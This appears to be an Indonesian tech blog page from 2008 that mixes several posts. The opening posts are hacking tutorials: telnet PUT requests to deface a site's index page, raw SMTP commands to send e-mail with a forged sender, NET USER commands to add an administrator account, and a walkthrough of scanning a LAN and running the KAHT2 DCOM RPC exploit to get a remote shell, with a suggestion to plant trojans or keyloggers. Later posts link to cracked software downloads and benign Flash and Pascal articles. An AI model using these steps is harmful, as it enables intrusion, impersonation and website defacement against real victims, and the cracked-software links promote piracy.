Popular News

Loading...

Sabtu, 08 Maret 2008

Menggunakan Microsoft Telnet

1. Mengenal Microsoft Telnet
Microsoft telnet adalah program bawaan dari windows. Program ini berguna untuk mengakses ke web, untuk keperluan upload data, dll. Tapi program ini justru dimanfaatkan oleh hacker-hacker seperti kita. Program ini fungsinya sama dengan NetCat. Disini saya menyertakan program netcat agar anda tidak bingung. Program netcat, adalah program yang pualing sering digunakan oleh hacker.

2. Menggunakan Netcat Untuk keperluan Upload data
Seperti pada tujuannya, bahwa netcat berfungsi untuk keperluan upload data ke web. Sekarang kita akan mencoba meng-upload data ke-web dengan netcat. Halaman utama biasanya adalah : index.htm atau index.html bukan? Nah coba bayangkan jika halaman itu diganti oleh kita? Pasti web akan dideface oleh kita bukan?

Nah ini cara menggunakan telnetnya.

Pertama,
Klik Start, Run. Ketikan telnet.exe
Setelah muncul maka ketikan
Code:
Welcome to Telnet Client

Escape Character is 'CTRL + ]'

Microsoft Telnet > [b]o www.namaweb.com 80
PUT /index.html HTTP/1.1
Host:www.namaweb.com
Content-Legth: 23
[i](enter)
(enter)[/i][/b]


Penjelasan Kode:

Kata yang dicetak tebal : Kita mengetiknya
Kata yang dicetak miring & tebal : kita menekan tombolnya

Kode : o www.namaweb.com 80 berarti perintah untuk telnet membuka www.namaweb.com dengan port 80. Port 80 adalah port untuk akses upload file. Anda tidak harus selalu menggunakan port 80. Anda bisa menggunakan akses port darurat, jika port 80 tertutup. Misal 123 atau 123456.

3. Menggunakan Telnet Untuk mengirim e-mail palsu!!

Saat anda menerima e-mail dari seseorang, janganlah langsung percaya. Misalkan, anda mendapat e-mail dari billgates. dengan alamat e-mail : bgates@microsoft.com, yang mengirimkan anda e-mail Tanpa alasan jelas. Sebenarnya itu adalah ulah hacker-hacker bocah. Cara ini sangat gampang!! bayi pun bisa .

Caranya,
Pertama,
Klik Start, Run. Ketikan telnet.exe
Setelah muncul maka ketikan
Code:
Welcome to Telnet Client

Escape Character is 'CTRL + ]'

Microsoft Telnet > [b]o web40609.mail.yahoo.com 80[/b]
[b]EHLO
MAIL FROM:bgates@microsoft.com
RCPT TO:you.domain.com
Hello, i'm gates
[i](enter)[/i].[i]
(enter)[/i][/b]


Penjelasan Kode:

Kata yang dicetak tebal : Kita mengetiknya
Kata yang dicetak miring & tebal : kita menekan tombolnya

Kode : o web40609.mail.yahoo.com 25 kode diatas untuk membuka SMTP pada web. anda bisa mengganti SMTP dengan alamat lain yang diinstall SMTP. Kali ini saya menggunakan SMTP yahoo. Port 25 adalah port untuk mengakses SMTP.

Jebol Password User Account

Mudah koq caranya, asal kamu masih bisa akses fisik ke komputer nya langsung (bukan remote computer).

Coba masuk / booting lewat DOS, kemudian masuk ke folder
C:\Windows\System32

Kemudian ketik perintah berikut :

NET USER namakamu passwordkamu /ADD
NET LOCALGROUP ADMINISTRATORS namakamu /ADD
NET LOCALGROUP USERS namakamu /DELETE


Nah abis itu restart tuh komp nya dan login dengan namakamu dan passwordkamu, kamu otomatis akan berstatus ADMINISTRATOR


note :
Sesuaikan namakamu dan passwordkamu dengan nama user dan password sesuai selera

Hacking jaringan dengan bug windows XP service pack 1 ke bawah

Tutorial ini murni hanya untuk pembelajaran (level pemula). Walaupun bugs udah sangat lama, tp untuk menambah wawasan sangat perlu. Basa basi cukup, sekarang alat alat yang dipakai :

1.RPCScan 2.03
2.Kaht2
3.Angry IP Scanner 2.21
4.Analisa ( tidak bikin pusing kok)
5.Rokok marlboro mentol


Langkah pertama
Laptop/komputer kita sudah terhubung kejaringan dan mendapat alamat IP lokal. Cek IP kita. Misal IP kita dapat adalah 192.168.100.100 dengan subnet 255.255.0.0 berarti jika kita lihat, kita berada network type class C. Kemungkinan IP yang ada dijaringan tersebut adalah 192.168.0.0-192.168.255. Misalkan lagi alamat IP yang kita dapat 168.0.0.10 dengan subnet 255.255.255.0 berarti kita berada di network dengan type class B dan kemungkinan alamat IP yang dipakai antara 168.0.0.1-168.0.0.254

Langkah kedua
Buka program Angry IP Scanner 2.21, klik options lalu klik options lg, pada group display pilih only alive. Itu menandakan kita menampilkan komputer yang hidup saja. Alamat IP komputer yang hidup berwarna bulatan biru dan yang mati berwarna merah. Karena kita sudah tahu alamat yang mungkin pada jaringan tersebut tinggal kita masukkan IP range 192.168.0.0 to 192.168.255.255 (istilah kerennya scanning masal). waktu yang dibutuhkan untuk melakukan scaning IP tersebut memakan waktu yang lama, nah disaat seperti ini perlu rokok marlboro mentolnya he..he...! atau kalau anda tidak punya waktu banyak, cukup scan IP yang dekat dekat kita saja. Contoh alamat IP kita 192.168.100.100, IP yang kita scan adalah 192.168.100.1-192.168.100.254. setelah semua disetting klik START. Akan didapat komputer yang hidup (jika anda beruntung).

Langkah ketiga
Setelah kita mendapatkan komputer yang hidup. Sekarang buka RPCScan, masukkan alamat IP komputer yang hidup ke host name. Atau kita bisa memasukkan IP kita pada :
Start IP (awal IP yg di scanning)
End IP (akhir IP yg di scanning)
lalu tekan ->(masukkan semua IP yang hidup). Klik Start(tanda panah biru).Cek hasil scanning, jika status VULNERABLE berarti komputer dengan alamat IP tersebut masih menggunakan windows service pack 1 kebawah. Berarti anda beruntung....

Langkah keempat
Panggil program kaht2 anda..! misal alamat IP yang vulnerable 192.168.100.10

D:\hacking\tools\kaht2>kaht2
_________________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
PUBLIC VERSION :P
________________________________________________
Usage: KaHt2.exe IP1 IP2 [THREADS] [AH]
example: KaHt2.exe 192.168.0.0 192.168.255.255
NEW!: Macros Available in shell enviroment!!
Type !! for more info into a shell.

D:\hacking\tools\kaht2>kaht2 192.168.100.9 192.168.100.10
Jika berhasil masuk kekomputer target, command akan kita akan berubah menjadi
C:\WINDOWS\system32>

Berarti komputer tersebut sudah menjadi tanggung jawab anda, silahkan berkreasi sendiri. Mungkin dengan menanamkan trojan, keyloger dan lain2 tergantung tingkat kekejaman anda. Atau Cuma lihat semua isi drive nya. Tapi tidak dianjurkan untuk berbuat jahat...

All famous antivirus programs for Nokia


18 the best of the best antivirus programs for Nokia.
Avira.GmbH.AntiVir.Mobile.v1.1.0.S60
Avira.GmbH.AntiVir.Mobile.v6.39.00.02.S60.SymbianOS.Retail_illusion
BitDefender.Mobile.Antivirus.v1.0.Beta.2.0.S60.SymbianOS
F-SecureMobileAnti-VirusS60_V2_2nd Edition.sis
F-Secure Disinfection Tools_SymbianOS8.1a
Kaspersky 6.0.7.0 With New Update
Kaspersky Anti-Virus Mobile 2.0.55 Release Candidate
McAfee.VirusScan.Mobile.v1.11.Virus.Definition.1.1.3
NetQin_V2.[1.50.15]_for_OS7 .SIS
PandaSecurity_SymbianOS7-8.1a
Simworks_AntiVirus_v1.2.1
SimWorks.AntiVirus.v1.30.S60.SymbianOS.Cracked-SyMPDA
Symantec Mobile Security Virus Definition 04 JUN 2k7.sis
Symantec 4.0.37
Symantec Mobile Threats Removal Tool
symantec_mobile_virus_def._25.07.2007
SymantecMS_Corporate_Edition_4.0.41
ZeonMobile.Anti.Virus.v1.00.S60.SymbianOS.Cracked-BiNPDA


http://rapidshare.com/files/88488341/2129AFN .rar

MotoTools 2007 1.32


Using state of the art unlocking technology, your Motorola can be unlocked in a matter of minutes, easily, and cheaper than any other Motorola unlocking service available. Our Unlocking service really is the lowest priced on the internet. We offer you choice! Phone locking is when a specific network carrier programs your mobile/cell phone so it only accepts their network SIM cards, ie. Vodafone phones only accept Vodafone SIM cards. In short, forcing you to pay them, and not have the choice to change to a cheaper, better network, where you wil be able to obtain cheaper calls and texts and other great deals and offers. Phone unlocking is the removal of this lock, enabling the phone to be used with ANY network.

Download: 1.85 MB
http://rapidshare.com/files/88258872/2105MT.v1.32.rar

MyPhoneExplorer 1.6.4 (Sony Ericsson)



Simply explore your SonyEricsson phone ! With this program you can administer its Sony-Ericsson mobile phone simply. MyPhoneExplorer is a free and useful program with the help of which you can administer its Sony-Ericsson mobile phone simply. Connect your phone via cable, bluetooth or infrared and you'll be surprised how easy and efficient you can manage your phone with this compact software.


Download: 2.71 MB
http://rapidshare.com/files/77179588/1553MPE.v1.6.4 .rar

MobiFactor PowerMP3 v1 00 S60 SymbianOS



PowerMP3
will turn your S60 smartphone into powerful MP3, OGG, AAC and M4A player.

PowerMP3 includes a lot of features:
* Play music in MP3,OGG, AAC and M4A audio file formats
* Create custom Playlists to organize your music
* High quality skins
* 10-Band Graphical Equalizer for all kinds of music
* Graphical Spectrum analyzer
* Adjust the Balance while song playing
* Background Playback
* PowerMP3 resumes playback after incoming or outgoing calls
* Set the playing position with Fast forward and Fast rewinding
* Powerful Equalizer presets management.

Download: 252.98 KB
http://www.mediafire.com/?59umgnnfudk

55 Useful JAVA Programs For Mobile


55 Useful JAVA Programs For Mobile

Download: 12.9 MBhttp://rapidshare.com/files/57131868/927UJPM.rar

SmartMovie v3.25 Player + Converter



Which has following changes from previous version (3.20):

- Redesigned cleaner interface
- All device types now covered by same converter (no separate Symbian/PocketPC/Palm versions)
- Support for unicode file names and path names
- Portrait view removed
- Device skins removed
- Predefined optimal settings for all supported device types
- Dropped support for Windows 98/ME
- It will ask u new registration code /unlock key use ur cellphone smartmovie player for genrating new key!!!

Download: 2.53 MB
http://rapidshare.com/files/51879757/720SM.v3.25.rar

Create Ringtone 4.92




Ringtone Audio Converter Features:

Read MP3, VMA, OGG, WAV audio files
Get tracks from audio CDs
Change MP3 bitrate and WAV sample rate
Sound amplifier to increase volume in audio sources
Preview your ringtone by listening to the selection, or listen to the entire audio file
Save the ringtone you created to any location on your computer as an MP3 or WAV file
Send the ringtone to your mobile phone
Wallpaper Image Converter Features:
Read JPG, PNG, BMP, EMF, WMF digital images
Get images from windows clipboard
Crop and resize the image
Rotate and flip the image
Change the image resolution to fit your phone screen size
Preview your wallpaper before sending it to the mobile phone
Save the wallpaper you created to your computer as a JPEG file
Send the wallpaper to your mobile phone
File Sender Features:
Send any file supported by your mobile phone
Send SMS with a link to your file for download

Download: 2.39 MB
http://rapidshare.com/files/37491883/CreatRin4.92.rar

Mobile Master Professional 6.8.1.2395

Mobile Master Professional 6.8.1.2395

Mobile Master is a Cell phone and handset manager for Windows and synchronizes with a few mouse clicks your contacts and appointments between the handset and your computer. Edit and synchronize calendar entries (appointments and tasks).
Send, read, archive SMS Note: the SMS Servant is included in the Mobile Master installation but requires an extra license. Logo-Editor, modify ring tone. Copy Station for transmitting your address book easily from one phone to the other. Mobile Master Agent: reach always the important functions easily and start e.g. Mobile Master automatically as soon as your mobile phone is connected to the PC.

Download: 12.7 MB
http://rapidshare.com/files/34312698/392MMP.v6.8.1.rar

Wings Brushes For Photoshop


Wings Brushes For Photoshop

2.3 Mb

http://rapidshare.com/files/94743316/Wings.rar

Acronis Disk Director Server 10.0.2169


Partition Manager
allows you to resize, move, copy, split, and merge partitions without losing your data.
Partition Recovery
allows you to recover accidentally lost or deleted partitions.
Disk Editor
is a disk drive repair tool that allows you to perform advanced operations on your hard disk drive, such as restoration of boot records and hexadecimal editing.
Data Destruction
allows you to wipe out all data from a deleted partition and from unallocated space.
Some other features:
Microsoft VistaTM Support — Support for Microsoft's latest and most robust operating system to date.
Command-line interface — create scripts for application tasks.
Application log — view all actions performed using the application.


http://rapidshare.com/files/85000623/Acronis_Disk_Director_Server_10.0.2169_sh.rar

Internet Video Converter 1.52.14



Internet Video Converter can convert between various popular video formats.

Internet Video Converter is a frontend that provides a user interface (GUI) for several Open Source video conversion products. It enables you to convert between various popular video formats including Mpeg, DV, Quicktime, Windows Media, Xvid, H264, 3GP, PSP, iPod and Flash video (FLV, SWF).

Furthermore, it can capture screenshots from videos, extract video soundtracks and export them to WAV or MP3 format and add titles to converted iPod and PSP videos. The program also includes an option that allows you to download videos from many popular websites (YouTube etc.) but this feature uses an online service which was never available when we tested it. Internet Video Converter is not overly user friendly but video conversions work well.


QuickTime 7.4


QuickTime 7.4
Just launch QuickTime Player, and there�s no telling where you�re likely to land.
The Player may whisk you to the Moon or perhaps to an exotic location on this planet.
Take you on a virtual field trip to the National Baseball Hall of Fame and Museum.
Or treat you to the latest news, movie trailers, music videos, HBO series or PBS specials.

Password Protector 1.6



Password Protector is an intelligent real-time password protection software. It can help you keep your password from being stolen by spywares and trojans. It is different from traditional anti-spyware tools and trojan removers. Instead of searching for spywares and trojans by matching the definition database of them, Password Protector is based on action detecting system.

When a spyware or a trojan is attempting to steal your password, credit card number or some other privacy information, Password Protector can detect the action and inform you to react in time. Thus, even the newest spywares, trojans or unknown variations of them can steal nothing from your computer. Under the protection of Password Protector, you will feel extra safe when you enter password on your computer.

Xara Menu Maker v1.1



Dynamic menus in an instant

Create professional, high-quality NavBars & DHTML menus at the click of a button. Xara Menu Maker takes the mystery out of dynamic hierarchical menus and lets literally anyone create cool and clever DHTML menus with classic graphical NavBars.
All NavBars and Menus on this site are created with Menu Maker.

Kamis, 06 Maret 2008

Animasi Flash dengan SwishMax

Komputer saat ini sudah tidak asing lagi bagi sebagian orang. Bahkan, pada beberapa bidang kerja, penggunaan komputer menjadi suatu keharusan untuk menunjang pekerjaan pada suatu perusahaan. Begitu juga dalam dunia pendidikan. Karena komputer tidak dapat dilepaskan dari dunia pendidikan. Bahkan di perguruan tinggi, ilmu komputer menjadi suatu mata kuliah yang saat ini banyak diminati oleh masyarakat.

Oleh sebab itu, maka pengenalan komputer pada usia dini sangat diperlukan. Namun kemudian timbul suatu pertanyaan, bagimana cara mengenalkan komputer tersebut kepada anak-anak sekolah dasar ataupun taman kanak-kanak ? salah satunya adalah memasang sebuah aplikasi game/permainan yang disukai oleh anak-anak pada usia tersebut. Saat ini, jika kita melihat ke sebuah toko yang menjual game, tentu bermacam-macam jenis game yang dapat kita temukan. Nam un tidak semua game yang ada dapat menunjang apa yang diberikan di sekolah formal mereka.

Game yang berbau pendidikanlah yang sebaiknya kita berikan kepada anak-anak pada usia sekolah tersebut, karena disamping mereka bermain, meraka juga dapat belajar komputer dan belajar pelajaran yang mereka dapat disekolah.

Bab 1 Membuat Game Pendidikan Sederhana

… tunggu seri berikutnya !

DOWNLOAD ARTIKEL LENGKAP (PDF):
  1. ranto-swish-01.zip
ARTIKEL LAIN YANG BERHUBUNGAN:
  1. Cara Membuat Tampilan Menu yang Disertai Animasi Flash dalam Visual Basic Basic 6.0
  2. Tutorial Flash Mx bagi Pemula
  3. Tutorial Flash 4.0
  4. Membuat Web Photo Gallery Dengan Adobe Photoshop CS3
  5. Optimasi Flash pada Website agar Search Engine Friendly
  6. Belajar Membuat Animasi
  7. Action Script 2.0 pada Flash MX 2004
  8. Dasar Pembuatan Animasi dengan Java
  9. Presentasi Menarik Dengan Adobe Flash
  10. Download IOS menggunakan Xmodem dan TFTPDNLD

Mengenal Konsep Bitrate untuk Audio-Video

Di era globalisasi dan tingkat turbulensi persaingan bisnis yang tinggi dalam saat ini, kehadiran komputer bagi suatu perusahaan sudah dirasakan sebagai kebutuhan yang krusial untuk kemajuan dan keberhasilan bisnis sehingga bukan lagi sebagai kebutuhan pendukung dari manajemen. Kehadiran komputer sebagai alat untuk mengolah data berdampak besar bagi perusahaan baik dalam manajemen strategik maupun manajemen operasional, biasanya tercermin dalam tahapan planning, implementing, monitoring, dan controlling. Kebutuhan penggunaan alat bantu dalam pengolahan data sesungguhnya sudah dikenal dari zaman dahulu.

Konon alat yang digunakan untuk pengolahan data pada zaman purbakala adalah dengan penggunaan tulang yang difungsikan sebagai pengingat, alat komunikasi, penghitung umur dan pengukur jarak. Di samping itu bisa juga penggunaan batu karang, lempengan tanah liat, batu terstruktur, lempengan kayu, simpulan tali, dan kulit binatang sebagai alat untuk mencatat, berkomunikasi, bertransaksi dan berhitung. Bangsa Yunani dan Romawi (400 SM) tercatat sebagai bangsa yang mempopulerkan penggunakan lempengan kayu, tulang, lilin dan tembaga metal untuk pembuatan catatan dalam perhitungan hutang piutang, pengeluaran, dan pencatatan harta yang dimiliki pertama kali. Setelah abad 19 terjadi peralihan dari alat manual ke alat mekanik dan mekanik-elektronik.

DOWNLOAD ARTIKEL LENGKAP (PDF):
  1. ranto-konsep_bitrate.zip
ARTIKEL LAIN YANG BERHUBUNGAN:
  1. Mendownload Video Youtube
  2. Aplikasi J2ME Untuk Video Player Online
  3. Persaingan Sistem Operasi
  4. Ketika mplayer Mulai Membandel
  5. Konversi File FLV ke Format Lain
  6. Statistik Lagu XMMS
  7. Mengenal Protokol VoIP: SIP
  8. e-Post : Konsep Baru Pengiriman
  9. Konsep Dasar Membuat Web
  10. Multimedia Instructional Design - Pengantar

Menggunakan VCD Cutter

Terkadang saat menonton sebuah Film, kita melihat cuplikan-cuplikan yang baik, atau mungkin juga kita sedang mempersiapkan proyek multimedia yang membutuhkan potongan-potongan dari film yang berbeda, tetapi bagaimana caranya ? Banyak software pemotong movie dan salah satunya yaitu VCD CUTTER yang akan kita bahas berikut.

DOWNLOAD ARTIKEL LENGKAP (PDF):
  1. ranto-vcdcutter.zip
ARTIKEL LAIN YANG BERHUBUNGAN:
  1. Membuat Album Foto Dengan Cepat & Mudah Menggunakan IrvanView 3.85
  2. XML Parsing Pada J2ME Menggunakan kXML2
  3. Implementasi Samba PDC Menggunakan Backend LDAP
  4. Keyboard Shorcut di Microsoft Windows 98
  5. Eksekusi Perintah DOS dari Web Browser
  6. Bermain-main dengan DIA, Visionya Linux
  7. Instalasi PDFLib Pada PHP
  8. Setting Dial-Up Internet di Linux Mandriva One 2007
  9. Optimasi Flash pada Website agar Search Engine Friendly
  10. Cara membuat game berbasis Java menggunakan Greenfoot bag. 1

Cepat Mahir Pemrograman Game dengan MMF (Multimedia Fusion)

Apakah kamu pernah berkeinginan untuk menciptakan sesuatu pada komputermu? Tidak hanya pada surat, laporan atau pada game yang bisa kamu jalankan sendiri. Misalnya game, mungkin kamu harus mempunyai ide utuk membuat game yang kamu inginkan,mungkin juga kamu tidak menemukan program untuk melakukan apa yang kamu inginkan. Makalah ini akan sangat membantumu, yang disebut Multimedia Fusion.

Multimedia Fusion (MMF) adalah suatu alat yang bisa menciptakan segala jenis dari program computer, seperti games, screensavers, program educational, utilities atau aplikasi lainnya. Ini bisa dipelajari tanpa harus belajar bahasa pemrograman dan tanpa harus mengerti tentang bagaimana menjalankannya pada hardware computer atau segala macam tentang system pada Windows dan DirectX. MMF bekerja pada Visual Environment dengan alat-alat yang mudah didapat dan semuanya dapat dijalankan dengan Mouse.

Sasaran pembuatan game ini adalah untuk mempelajari bagaimana membuat video game bagi orang awam yang mana baru mengenal berbagai produk dari “Clickteam”. Ini akan menjadi dasar bagi kamu yang ingin mempunyai pengalaman dengan product ini. Pengajaran ini akan menjadi jalan yang mudah untuk membuat game pertamamu dan menurunkan beberapa konsep dasar dari Multimedia Fusion 1.5.

Tujuannya adalah untuk mendapatkan game sederhana dengan cepat. Pemakai yang berpengalaman akan mengetahui jalan yang terbaik untuk menyelesaikan beberapa tugas. Yang artinya seorang dimulai dari nol jika mengikuti langkah-langkah sederhana dalam pengajaran ini,akan lebih mungkin untuk menjadi seorang yang berpengalaman dengan sangat mudah.

DOWNLOAD ARTIKEL LENGKAP (PDF):
  1. ranto-mmf.zip
ARTIKEL LAIN YANG BERHUBUNGAN:
  1. Cepat Mahir Bahasa Pascal
  2. Cepat Mahir Bahasa C
  3. Cepat Mahir Python
  4. Cepat Mahir Visual Basic .NET
  5. Balap Mobil dengan Trophy
  6. Cepat Mahir Visual Basic 6
  7. Cube: Bertahan Hidup di Dunia Ganas
  8. Cepat Mahir ASP
  9. Membuat Game dengan Pascal
  10. Main DOOM di Linux

Presentasi Menarik Dengan Adobe Flash

Cara membuat presentasi menarik dengan menggunakan Adobe Flash.

ARTIKEL LAIN YANG BERHUBUNGAN:
  1. Cara Membuat Tampilan Menu yang Disertai Animasi Flash dalam Visual Basic Basic 6.0
  2. Action Script 2.0 pada Flash MX 2004
  3. Membuat Presentasi dengan Impress
  4. Calc: Search and Highlight
  5. Presentasi dengan LyX Melalui Acrobat Reader
  6. Tutorial Flash 4.0
  7. Membuat Countdown Pembuka Presentasi dengan OO Impress
  8. Tutorial MagicPoint
  9. HTML Report dengan Delphi
  10. Membuat Web Photo Gallery Dengan Adobe Photoshop CS3

Penggabungan Dua Lagu dengan Cool Edit Pro 2.0

Cool edit pro adalah software yang digunakan untuk mengedit file-file yang berekstensi mp3, wav, cda, cel dan sebagainya yang mendukung format suara. Pada pembahasan kali ini kita akan mencoba menggabungkan (mixing) suara dalam hal ini lagu, antara lagu yang satu dengan yang lainnya, dan berbagai efek yang bisa digunakan dalam cool edit pro 2.0.

DOWNLOAD ARTIKEL LENGKAP (PDF):
  1. Ranto-lagu.zip
ARTIKEL LAIN YANG BERHUBUNGAN:
  1. Edit Audio dengan Audacity
  2. Statistik Lagu XMMS
  3. Panduan Penggunaan Plugin Lyrict di WinAmp
  4. Membangun MP3 Streaming Server
  5. My Open Radio
  6. Media Player Untuk Situs Dengan Bahasa HTML
  7. Perang Tanding KDE VS GNOME
  8. Perkembangan Hardware Komputer
  9. Girl from Ipanema dan Linux
  10. Membuat Studio Rekaman Sendiri

Subtitel Tanpa Encoding? Mudah!

“Suatu hari anda menjamu seorang kolega yang 100% bukan orang Indonesia. Bule Amerika misalkan. Nah, si bule berniat untuk menanamkan modal untuk usaha anda, katakanlah usaha jual beli DVD tembang Jawa 100% Asli. Anda kemudian senang dan mengajak si bule untuk santai sambil mendengarkan VCD yang kebetulan VCD Didi Kempot yang baru saja anda beli di Mangga Dua. Si bule kagum dan berniat menyimpan kopian video Didi Kempot ke laptopnya, (Waahhh! Bule pembajak…!) dan menanyakan apakah ada yang disertai dengan teks terjemahan lagu tersebut dalam bahasa inggris, karena, memang secara TIDAK kebetulan, tentu saja si bule tidak bisa berbahasa Jawa. Mengatakan tidak mungkin bukan pilihan yang tepat, karena bisa-bisa si bule tersinggung dan tidak jadi menanamkan modal. Menjelaskanpun berbahaya karena bisa-bisa si bule salah tanggap mengingat bahasa Inggris anda pas-pasan (Kita anggap saja begitu…). Anda ingin mencari di seluruh Mangga Dua VCD Didi Kempot dengan subtitel inggris? Boleh saja, tapi dijamin tidak akan berhasil.

“Satu-satunya cara adalah menambahkan subtitel dalam bahasa inggris pada Video Didi Kempot dengan cara mengeditnya melalui editor video, kemudian di encode ulang. Masalahnya, kemarin, adik anda menggadaikan PC Intel Core Duo anda dengan beras akibat gaji Honornya ditahan untuk dirapel pada bulan Maret. Sekarang, yang tersisa adalah Desktop Intel Pentium 2 peninggalan masa-masa SMA anda.

“Menambahkan subtiitel melalui Intel Pentium 2 dengan OS Windows98 First Edition? Sangat Hampir Mustahil dilakukan. Mengambil si Core Duo juga bukan langkah yang tepat karena adik anda menggadaikannya pada Lintah Darat yang bejibun Bodyguard. Apa akal?”

“Oke, mungkin ilustrasi diatas sedikit berlebihan, baik tentang bule yang suka lagu Didi Kempot, maupun anda yang punya Intel Core Duo. Tapi yang lebih penting kita fokus saja pada satu hal. Adakah cara menambahkan subtitel tanpa melalui proses encoding video, yang tentu saja programnya berat minta ampun?

“Jawabannya : ADA! Silahkan download tulisan dibawah untuk lebih jelasnya.

DOWNLOAD ARTIKEL LENGKAP (PDF):
  1. Ranto-subtitel1.pdf
ARTIKEL LAIN YANG BERHUBUNGAN:
  1. Installasi AuraCms Dengan Xampp
  2. HTML Report dengan Delphi
  3. Mudah Dan Cepat Menguasai OpenOffice.org Writer (Bag 2)
  4. Membangun Mail Server dengan Postfix
  5. Menjalankan Program File di Web
  6. Mengganti Templates Ala Joomla
  7. Cepat Mahir Pemrograman Game dengan MMF (Multimedia Fusion)
  8. Mengenal Resource Hacker
  9. Bekerja dengan Distribusi Mikro atau Linux dalam Kantong Anda
  10. Membaca Proses dengan Shell Scrip

Membuat Kuis Interaktif Dengan Flash 8.0

Dalam modul sederhana ini, materi yang dibahas adalah script yang dipergunakan dalam pembuatan aplikasi kuis dengan software MM Flash. Untuk kesempatan yang pertama ini, pembahasan dibatasi hanya membahas alur pemrograman aplikasi kuis secara garis besar. Pada kesempatan yang lain, pembuatan aplikasi kuis akan dibahas secara terperinci dan lebih detail, disertai contoh-contoh sederhana untuk menjelaskan logika script.
Proses pembuatan aplikasi kuis ini dibagi menjadi 6 tahap.

Tahap I. Membangun logika program dan memahami daftar soal yang berstruktur xml
Tahap II. Menyusun array daftar soal yang acak
Tahap III. Menampilkan soal, gambar, dan pilihan jawaban dengan animasi script
Tahap IV. Memakai penghitung waktu
Tahap V. Membuat fungsi pemeriksa pilihan jawaban
Tahap VI. Menyusun semua fungsi dalam satu aplikasi kuis dan membuat preloadernya

Sebagaimana layaknya membuat suatu aplikasi atau program yang menggunakan bahasa VB, C, Delphi, Phyton, dan lain-lain, kita dapat merancang flowchart terlebih dahulu sebagai tahap awal pengerjaan, sehingga nantinya dapat memudahkan kita dalam mengerjakan coding (listing, atau kode program) dan pengembangannya.

sumber: Webmedia Training Center

DOWNLOAD ARTIKEL LENGKAP (PDF):
  1. eko-kuisinteraktif.zip
ARTIKEL LAIN YANG BERHUBUNGAN:
  1. Action Script 2.0 pada Flash MX 2004
  2. Presentasi Menarik Dengan Adobe Flash
  3. Tutorial Flash 4.0
  4. Cara Membuat Tampilan Menu yang Disertai Animasi Flash dalam Visual Basic Basic 6.0
  5. Membuat Web Photo Gallery Dengan Adobe Photoshop CS3
  6. Tutorial Flash Mx bagi Pemula
  7. Optimasi Flash pada Website agar Search Engine Friendly
  8. SMS Gateway Menggunakan Gammu
  9. Download IOS menggunakan Xmodem dan TFTPDNLD
  10. Penggunaan Pen Tool Pada Macromedia Flash

Membangun Aplikasi Touchscreen Berbasis Web

Membuat Aplikasi Touchscreen yang dinamis terkadang terasa sulit jika hanya mengandalkan aplikasi multimedia seperti Director atau Flash, namun dengan aplikasi berbasis web hal tersebut bisa menjadi mudah.

Download Artikel Lengkap (PDF):

  1. Membangun Aplikasi Touchscreen Berbasis Web
ARTIKEL LAIN YANG BERHUBUNGAN:
  1. Membangun Aplikasi Web Berbasis PHP dengan Nolkode
  2. Aplikasi GUI Menggunakan PHP dan gambArt
  3. Membuat Aplikasi Peta Sederhana menggunakan AJAX
  4. Membangun Server dengan OpenSource
  5. Membangun Aplikasi Web dengan AJAX
  6. Open Source Software (OSS) untuk Berbagai Kebutuhan
  7. Membangun Aplikasi Web dengan ASP.NET
  8. Pakai Windows dari Linux, Mengapa Tidak ?
  9. Membangun File Manager Berbasis Web dengan PHP
  10. Membuat Grafik pada Web dengan JPGraph

Konversi File FLV ke Format Lain

Flash Video (FLV) adalah video dengan format flash movie yang digunakan di Internet. FLV biasanya menjadi format standar yang digunakan oleh Youtube, Google Video, Reuters.com, Yahoo!Video, MySpace, dan lain-lain.

Untuk memutar file dengan format FLV maka dibutuhkan FLV Player. Hal ini terjadi karena format FLV tidak bisa dimainkan dengan pemutar musik seperti Winamp, Windows Media Player, dll. Berbeda dengan format MPEG, AVI, Mp3, dan lain-lain, bisa dengan mudah dimainkan dengan pemutar musik tersebut.

DOWNLOAD ARTIKEL LENGKAP (PDF):

  1. Ranto-FLV
ARTIKEL LAIN YANG BERHUBUNGAN:
  1. Memilih Format File yang Tepat untuk Image
  2. Konversi MP3 dan OGG Vorbis
  3. Membuat File PDF dengan PDF-Tools
  4. Konversi Desimal ke Biner Dengan Delphi
  5. Aplikasi J2ME Untuk Video Player Online
  6. Menjalankan Program File di Web
  7. Menampilkan Kontributor Linux dengan Menarik
  8. PDF? Pakai PHP saja!
  9. Sharing File di Jaringan dengan NFS
  10. Menggambar dengan OpenOffice.org Draw

Flash dan Power Point

ARTIKEL LAIN YANG BERHUBUNGAN:
  1. Tutorial Flash 4.0
  2. Optimasi Flash pada Website agar Search Engine Friendly
  3. Action Script 2.0 pada Flash MX 2004
  4. Tutorial Flash Mx bagi Pemula
  5. Presentasi Menarik Dengan Adobe Flash
  6. Cara Membuat Tampilan Menu yang Disertai Animasi Flash dalam Visual Basic Basic 6.0
  7. Penggunaan Pen Tool Pada Macromedia Flash
  8. Download IOS menggunakan Xmodem dan TFTPDNLD
  9. Hack! Maaf, Ini Bukan Soal KPU
  10. Konsep Dasar WLAN

Membuat Game dengan Pascal

Pernahkah anda merasa penasaran bagaimana sebuah game dibuat?

artikel ini akan memberikan anda sebuah gambaran awal bagaimana sebuah game dibuat, dalam artikel ini akan dibahas mengenai pembuatan tetris yang menggunakan kompiler pascal.

DOWNLOAD ARTIKEL LENGKAP (PDF):
  1. Artikel dan source kode
ARTIKEL LAIN YANG BERHUBUNGAN:
  1. Membuat CGI dengan Pascal
  2. Pascal di Linux
  3. Pemrograman Pascal
  4. Cara membuat game berbasis Java menggunakan Greenfoot bag. 1
  5. Cepat Mahir Bahasa Pascal
  6. Balap Mobil dengan Trophy
  7. Main DOOM di Linux
  8. Pemograman melalui Visual Basic dan Turbo Pascal
  9. Cepat Mahir Pemrograman Game dengan MMF (Multimedia Fusion)
  10. Prosedur dan Fungsi di Turbo Pascal

Rabu, 05 Maret 2008

Joomla Tutorial

NEW! We are happy to introduce to your our new Joomla 1.5 tutorial! SiteGround is the first host to offer free Joomla 1.5 installation with its Joomla hosting package.

Joomla CMS is a multi functional Open Source application for creating websites. It is free to use and has a great community support. With SiteGround hosting you can use all Joomla features.

Joomla! main benefits:

  • Multiuser and Multilevel environment: many users can interact and contribute to the development of the Joomla-based site. Users can be assigned to different groups with different privileges;
  • WYSIWYG editor - the intuitive What You See Is What You Get editor allows for easy editing of the content online;
  • Additional components / modules - the Joomla system can be easily enhanced with additional functionalities from integrating a forum to installing an E-commerce solution;
  • Templates - there are numerous free Joomla templates on the net and Siteground is proud to offer some of the best ones!

